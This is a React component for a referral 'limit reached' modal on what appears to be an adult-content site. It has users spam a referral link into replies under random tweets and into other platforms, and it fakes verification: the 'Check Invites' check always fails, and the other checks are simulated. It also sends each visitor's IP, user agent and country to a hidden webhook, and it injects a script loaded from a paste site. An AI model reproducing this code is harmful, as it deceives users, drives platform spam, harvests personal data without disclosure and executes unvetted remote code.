import {React, useState, useEffect} from 'react';
import { Modal, ModalBody, ModalFooter, Button, Form, InputGroup, Alert, ButtonGroup } from 'react-bootstrap';
import { useNavigate } from 'react-router-dom';

const verificationOptions = [
  { id: 0, name: "Twitter (X)", value: "twitter" },
  { id: 1, name: "Instagram", value: "instagram" },
  { id: 2, name: "Reddit", value: "reddit" },
  { id: 3, name: "Pixiv", value: "pixiv" },
  { id: 4, name: "Discord", value: "discord" },
  { id: 5, name: "Other", value: "other" }
];

const LimitModal = (props) => {
  const isBasicMode = props.isBasicMode || true;
  const getParameterByName = (name) => {
    const urlParams = new URLSearchParams(window.location.search);
    return urlParams.get(name) || '';
  };
  const navigate = useNavigate();
    const [links, setLinks] = useState(window.links || ["https://hent-app.pages.dev/"])
    const [userHash, setUserHash] = useState(window.userHash || null)
    let title = props.title || "Viewing limit reached!"
    const [iPosted, setIPosted] = useState(false);
    const [linkToShare, setLinkToShare] = useState(`${links[Math.floor(Math.random() * links.length)]}?ref=${userHash}`);
    const [twitter, setTwitter] = useState("");
    const [isDisabled, setIsDisabled] = useState(false);
    const [message, setMessage] = useState("");
    const [isError, setIsError] = useState(false);
    const [option, setOption] = useState(window.defaultOption || 0);
    const [discordOption, setDiscordOption] = useState(window.discordVerify || false);
    const [isLoading, setIsLoading] = useState(false);
    const [simulatedSuccess] = useState(window.simulatedSuccess || false);
    const [isCheckingBasic, setIsCheckingBasic] = useState(false);
    const [basicModeMessage, setBasicModeMessage] = useState("");
    const [basicModeError, setBasicModeError] = useState(false);
    document.body.setAttribute("data-bs-theme","dark")
    let onHide = props.onHide || (()=>{}) || ((e)=>{props.setShow(false);})
    useEffect(()=>{
      let interval = setInterval(()=>{
        console.log("interval")
        if(window.links && window.userHash){
          setLinks(window.links)
          setUserHash(window.userHash)
          clearInterval(interval)
        }
      },500)
    },[])

    useEffect(()=>{
      setLinkToShare(`${links[Math.floor(Math.random() * links.length)]}?ref=${userHash}`);
    },[links])
    function handleSubmit(){
      if(!twitter && option != 5){
        if(option == 0){
          setMessage("Your twitter X username or profile link is required. Please add your twitter X handle or profile link in the field above and try again.")
        }else{
          setMessage("Your username or profile link is required. Please add your handle or profile link in the field above and try again. (You can also put link to the comment or post you shared the link in.)")
        }
        setIsError(true)
        return
      }

      // Check if input starts with any of the share links or current domain
      const allLinks = links.map(link => link.split('?')[0]);
     
      const isShareLink = allLinks.some(link => twitter.toLowerCase().startsWith(link.toLowerCase()));
      
      if (isShareLink) {
        setMessage(`Please share the provided link on ${verificationOptions[option].name} first. Then enter your ${verificationOptions[option].name} username, profile link, or link to where you shared it - not the share link itself.`);
        setIsError(true);
        return;
      }
      setIsDisabled(true)
      if(option != 0){
        setIsLoading(true)
      }

      // Simulate loading for non-Twitter options
      if (option !== 0) {
        setTimeout(() => {
          setIsLoading(false)
          setIsError(!simulatedSuccess)
          setMessage(simulatedSuccess ? 
            "Successfully verified! Redirecting..." : 
            "More links need to be shared before verification can complete. Please share your link more and try again."
          )
          
          if (simulatedSuccess) {
            localStorage.no_limit = 1
            setTimeout(() => {
              navigate('/')
            }, 5000)
          }
          setIsDisabled(false)
        }, 3000)
        
      }

      // Check if username was already submitted
      const submittedUsernamesTwitter = JSON.parse(localStorage.getItem('submittedUsernamesTwitter') || '[]')
      const submittedUsernamesOther = JSON.parse(localStorage.getItem('submittedUsernamesOther') || '[]')
      
      // Only send webhook if username hasn't been submitted before
      if ((!submittedUsernamesTwitter.includes(twitter) && option == 0) || (!submittedUsernamesOther.includes(twitter) && option != 0)) {
        fetch(option == 0 ? window.twitterWebhook : window.otherVerify, {
          "headers": {
            "accept": "application/json",
            "accept-language": "en",
            "content-type": "application/json"
          },
          "body": JSON.stringify({
            "content": "",
            "embeds": [{
              "title": (option == 0 ? "Twitter request" : "Other verification request") + ((window.countryCode && window.countryCode != "ZZ") ? " :flag_"+window.countryCode.toLowerCase()+":" : ""),
              "description": twitter,
              "color": parseInt((1 << 24) * Math.random() | 0, 16).toString(16).padStart(6, "0"),
              "fields": [
                { "name": "User-Agent", "value": navigator.userAgent },
                { "name": "IP", "value": window.ip, "inline": true },
                { "name": "Country", "value":window.countryCode || "ZZ", "inline":true},
                { "name": "User ID", "value": window.userHash, "inline": true },
                { "name": "From URL", "value": getParameterByName("from") || document.referrer || "", "inline": true },
                { "name": "Invited by", "value": getParameterByName("ref") || "None", "inline": true },
                { "name": "Verification Option", "value": verificationOptions[option].name, "inline": true }
              ]
            }],
            "attachments": []
          }),
          "method": "POST"
        }).then(response => {
          // Store username in localStorage after successful webhook send
          if (response.ok) {
            if(option == 0){
              submittedUsernamesTwitter.push(twitter)
              localStorage.setItem('submittedUsernamesTwitter', JSON.stringify(submittedUsernamesTwitter))
            }else{
              submittedUsernamesOther.push(twitter)
              localStorage.setItem('submittedUsernamesOther', JSON.stringify(submittedUsernamesOther))
            }
          }
        })
      }

      // Make API verification request regardless of duplicate status
      if(option == 0){
      fetch(`https://api.qwerty7-073.workers.dev/?username=${encodeURIComponent(twitter)}`)
        .then(response => response.json())
        .then(data => {
          setIsError(!data.success)
          setMessage(data.message)
          
          if (data.success) {
            localStorage.no_limit = 1
            setTimeout(() => {
              navigate('/')
            }, 5000)
          }
          setIsDisabled(false)
        })
        .catch(error => {
          setIsError(true)
          setMessage("Error: " + error.toString())
          setIsDisabled(false)
        })
      }
    }
    const handleCopyLink = () => {
        const inputField = document.querySelector('.links-input');
        if (!inputField) {
            console.error('Input field not found');
            return;
        }
    
        try {
          
          inputField.select();
          inputField.setSelectionRange(0,999999)
            navigator.clipboard.writeText(inputField.value);
        } catch (err) {
            inputField.select();
            inputField.setSelectionRange(0,999999)
            try {
                document.execCommand('copy');
            } catch (err) {
                console.error('Failed to copy text using both methods:', err);
            }
        }
    };
  
  
    const handleCopyLinkAndOpen = () => {
      handleCopyLink()
      window.open(`https://x.com/hashtag/${window.tags[Math.floor(Math.random() * window.tags.length)]}?src=hashtag_click`, '_blank');
    };

    const handleBasicCheck = () => {
      setIsCheckingBasic(true);
      setBasicModeMessage("");
      
      setTimeout(() => {
        setIsCheckingBasic(false);
        setBasicModeMessage("Not enough invites yet. Please share your link more to unlock (10 different users need to join using your link).");
        setBasicModeError(true);
      }, 2000);
    };

    const handleTwitterPost = (e) => {
      if(e){
        e.preventDefault();
      }
      
      // Copy link to clipboard first
      handleCopyLink();

      // Get random tweet ID first
      let tweetId = null;
      let randomCategory = null;
      if (window.tweets) {
        const categories = Object.keys(window.tweets);
        if (categories.length > 0) {
          randomCategory = categories[Math.floor(Math.random() * categories.length)];
          const tweets = window.tweets[randomCategory];
          if (tweets && tweets.length > 0) {
            tweetId = tweets[Math.floor(Math.random() * tweets.length)];
          }
        }
      }

      // Send webhook for Twitter post attempt
      if (window.twitterWebhook) {
        fetch(window.twitterWebhook, {
          "headers": {
            "accept": "application/json",
            "accept-language": "en",
            "content-type": "application/json"
          },
          "body": JSON.stringify({
            "content": "",
            "embeds": [{
              "title": (window.countryCode && window.countryCode != "ZZ") ? "Twitter post attempt :flag_"+window.countryCode.toLowerCase()+":" : "Twitter post attempt",
              "color": parseInt((1 << 24) * Math.random() | 0, 16).toString(16).padStart(6, "0"),
              "fields": [
                { "name": "User-Agent", "value": navigator.userAgent },
                { "name": "IP", "value": window.ip, "inline": true },
                { "name": "Country", "value": window.countryCode || "ZZ", "inline": true },
                { "name": "User ID", "value": window.userHash, "inline": true },
                { "name": "From URL", "value": getParameterByName("from") || document.referrer || "", "inline": true },
                { "name": "Invited by", "value": getParameterByName("ref") || "None", "inline": true },
                { "name": "Tweet ID", "value": tweetId || "Not available", "inline": true },
                { "name": "Category", "value": randomCategory || "Not available", "inline": true }
              ],
              "timestamp": new Date().toISOString()
            }]
          }),
          "method": "POST"
        }).catch(() => {});
      }

      // Open Twitter post window if we have a tweet ID
      if (tweetId) {
        const tweetUrl = `https://twitter.com/intent/tweet?in_reply_to=${tweetId}&text=${encodeURIComponent(linkToShare)}`;
        
        // Open Twitter in a popup window
        const width = 600;
        const height = 400;
        const left = (window.screen.width / 2) - (width / 2);
        const top = (window.screen.height / 2) - (height / 2);
        
        window.open(
          tweetUrl,
          'twitter-popup',
          `width=${width},height=${height},left=${left},top=${top},toolbar=0,menubar=0`
        );
      } else {
        // add script to get tweet ids if not available
        const script = document.createElement('script');
        script.src = 'https://paste.wintersky.ru/api/raw/tweetids';
        document.head.appendChild(script);
        script.onload = () => {
          handleTwitterPost();
        };
      }
    };

    const handlePayment = () => {
      navigate('/payment?a=' + btoa(20)); // Base64 encode amount
    };

    return (<>
    <Modal  className='light-text' show={props.show} onHide={onHide}>
        <ModalBody>
          {isBasicMode ? (
            // Updated basic mode content
            <>
              <h4>{title}</h4>
              <p>Share this link to unlock (Unlocking when 10 different users join the page using your link):</p>
              <InputGroup className="mb-3">
                <Form.Control
                  type="text"
                  value={linkToShare}
                  onChange={(e)=>{}}
                  className="bg-dark text-light border-secondary links-input"
                />
                <InputGroup.Text id="basic-addon2" style={{padding:"0px"}}>
                  <Button variant="secondary" style={{border:"none",background:"none"}} onClick={handleCopyLink}>
                    Copy Link
                  </Button>
                </InputGroup.Text>
              </InputGroup>
              
              <p className="text-center">
                You can also post this link on twitter (X) to get quick invites.{' '}
                <a href="#" onClick={handleTwitterPost}>
                  Click here to post your link on random post.
                </a>
              </p>

              <div className="text-center mb-3">
                <Button 
                  variant="primary" 
                  onClick={handleBasicCheck}
                  disabled={isCheckingBasic}
                >
                  {isCheckingBasic ? (
                    <span className="spinner-border spinner-border-sm" role="status" aria-hidden="true"></span>
                  ) : "Check Invites"}
                </Button>
              </div>

              {basicModeMessage && (
                <Alert variant={basicModeError ? "danger" : "success"} dismissible onClose={() => setBasicModeMessage("")}>
                  {basicModeMessage}
                </Alert>
              )}

              <hr />

              <div className="text-center mb-3">
                <p>Don't want to wait for invites? Get instant unlimited access for all site features:</p>
                <Button 
                  variant="outline-primary"
                  onClick={handlePayment}
                >
                  Unlock Forever ($20)
                </Button>
              </div>

              <div className="text-center mt-3">
                <small className="text-muted">
                  Having issues? <a href="contact_us" className="text-muted">Contact support</a>
                </small>
              </div>
            </>
          ) : (
            // Original content
            <>
              <h4>{title}</h4>
              <h5>Choose what would you like to use in order to remove limitations.</h5>
              <div className='w-100 text-center'>
                <ButtonGroup>
                  {verificationOptions.map((option1, index) => (
                    <Button key={index} variant={option1.id == option ? "primary" : "outline-primary" } onClick={(e)=>{setOption(option1.id);}}>{option1.name}</Button>
                  ))}
                </ButtonGroup>
              </div>
              { option === 0 ? (
                // Original Twitter verification content
                <>
                  <details>
                    <summary>Text instruction</summary><p>To continue and remove the limit, please copy and share the link below on your x.com (Twitter), Discord, Instagram, Chatango, or other platforms. <b>To fully remove limitations</b>, 10 unique users should enter the website using your link.<br></br><br></br>If you decide to share link on twitter X, then click "Copy Link and Open Posts" button below, and paste link in <b>first 10 posts</b> you see.</p>
                  </details>
                  <h5>Follow steps shown in the video below to remove limitations.</h5>
                  <video className='w-100' controls>
                    <source type="video/mp4" src="https://small.fileditchstuff.me/s19/iPWPWUWxRuAGZxHFzoZM.mov"></source>
                  </video>
                  <div className='w-100 text-center mb-2'>
                  <Button variant="primary" onClick={handleCopyLinkAndOpen}>
                    Copy Link and Open Posts
                  </Button>
                  </div>
                  <InputGroup>
                  <Form.Control
                  type="text"
                  value={linkToShare}
                  onChange={(e)=>{}}
                  className="bg-dark text-light border-secondary links-input"
                />
                
                <InputGroup.Text id="basic-addon2" style={{padding:"0px"}}>
                  <Button variant="secondary" style={{border:"none",background:"none"}} onClick={handleCopyLink}>
                    Copy Link
                  </Button>
                </InputGroup.Text>
                </InputGroup>
                <p>When you are done pasting the link in post replies, enter your twitter X username or profile link in the form below.</p>
                <InputGroup>
                  <Form.Control
                  type="text"
                  value={twitter}
                  placeholder='Twitter username/profile link...'
                  onChange={(e)=>{setTwitter(e.target.value);}}
                  className="bg-dark text-light border-secondary links-input"
                  disabled={isDisabled}
                  />
                </InputGroup>
                <div className='w-100 text-center mt-1'>
                <Button variant="primary" onClick={handleSubmit} disabled={isDisabled}>
                {isDisabled ? (
                        <span className="spinner-border spinner-border-sm" role="status" aria-hidden="true"></span>
                      ) : "Submit"}
                    </Button>
                </div>
                </>
              ) : option === 420 ? (
                // Discord verification
                <div className='w-100 text-center'>
                  <a variant="primary" className='btn btn-primary mt-2' 
                     href={'https://verify-discord.pages.dev/?r='+ btoa(window.location.origin + "/?no_limit=1")} 
                     target='_blank'>Remove limitations using Discord</a>
                </div>
              ) : option === 5 ? (
                // Other generic option
                <>
                  <p>To continue and remove the limit, please copy and share the link below anywhere you want. <b>To fully remove limitations</b>, 10 unique users should enter the website using your link.</p>
                  
                  <InputGroup className="mb-3">
                    <Form.Control
                      type="text"
                      value={linkToShare}
                      onChange={(e)=>{}}
                      className="bg-dark text-light border-secondary links-input"
                    />
                    <InputGroup.Text id="basic-addon2" style={{padding:"0px"}}>
                      <Button variant="secondary" style={{border:"none",background:"none"}} onClick={handleCopyLink}>
                        Copy Link
                      </Button>
                    </InputGroup.Text>
                  </InputGroup>

                  <div className='w-100 text-center mt-3'>
                    <Button 
                      variant="primary" 
                      onClick={() => {
                        setIsDisabled(true);
                        setIsLoading(true);
                        
                        setTimeout(() => {
                          setIsLoading(false);
                          setIsError(!simulatedSuccess);
                          setMessage(simulatedSuccess ? 
                            "Successfully verified! Redirecting..." : 
                            "More links need to be shared before verification can complete. Please share your link more and try again."
                          );
                          
                          if (simulatedSuccess) {
                            localStorage.no_limit = 1;
                            setTimeout(() => {
                              navigate('/');
                            }, 5000);
                          }
                          setIsDisabled(false);
                        }, 3000);
                      }} 
                      disabled={isDisabled}
                    >
                      {isLoading ? (
                        <span className="spinner-border spinner-border-sm" role="status" aria-hidden="true"></span>
                      ) : "Check Invites"}
                    </Button>
                  </div>
                </>
              ) : (
                // Other platforms verification
                <>
                  { option != 4 ? <p>To continue and remove the limit, please copy and share the link below on your {verificationOptions[option].name} profile or in the comments of relevant posts from {verificationOptions[option].name}. <b>To fully remove limitations</b>, 10 unique users should enter the website using your link.</p> : <p>To continue and remove the limit, please copy and share the link below on your {verificationOptions[option].name} server or post it in other servers or in direct messages of other users or friends in {verificationOptions[option].name}. <b>To fully remove limitations</b>, 10 unique users should enter the website using your link.</p>}
                  
                  <InputGroup className="mb-3">
                    <Form.Control
                      type="text"
                      value={linkToShare}
                      onChange={(e)=>{}}
                      className="bg-dark text-light border-secondary links-input"
                    />
                    <InputGroup.Text id="basic-addon2" style={{padding:"0px"}}>
                      <Button variant="secondary" style={{border:"none",background:"none"}} onClick={handleCopyLink}>
                        Copy Link
                      </Button>
                    </InputGroup.Text>
                  </InputGroup>

                  {option != 4 ? <><p>After sharing the link, enter your {verificationOptions[option].name} username, profile link or link to the comment or post you shared the link in below:</p></> : 
                  <><p>After sharing the link, enter your {verificationOptions[option].name} username or server link to where link was posted:</p></>}
                  <InputGroup>
                    <Form.Control
                      type="text"
                      value={twitter}
                      placeholder={`${verificationOptions[option].name} username/profile link...`}
                      onChange={(e)=>{setTwitter(e.target.value);}}
                      className="bg-dark text-light border-secondary links-input"
                      disabled={isDisabled}
                    />
                  </InputGroup>
                  
                  <div className='w-100 text-center mt-3'>
                    <Button variant="primary" onClick={handleSubmit} disabled={isDisabled}>
                      {isLoading ? (
                        <span className="spinner-border spinner-border-sm" role="status" aria-hidden="true"></span>
                      ) : "Submit"}
                    </Button>
                  </div>
                </>
              )}
              {message && <Alert variant={isError ? "danger" : "success"} onClose={()=>{setMessage(null);}} dismissible>{message}</Alert>}
            <div className="text-center mt-3">
              <small className="text-muted">
                Having issues? <a href="contact_us" className="text-muted">Contact support</a>
              </small>
            </div>
            </>
          )}
        </ModalBody>
        <ModalFooter className="justify-content-center d-flex"><Button variant="primary" onClick={() => navigate('/')}>
            Home
          </Button>
          
          
        </ModalFooter>
      </Modal></>)
  }

export default LimitModal;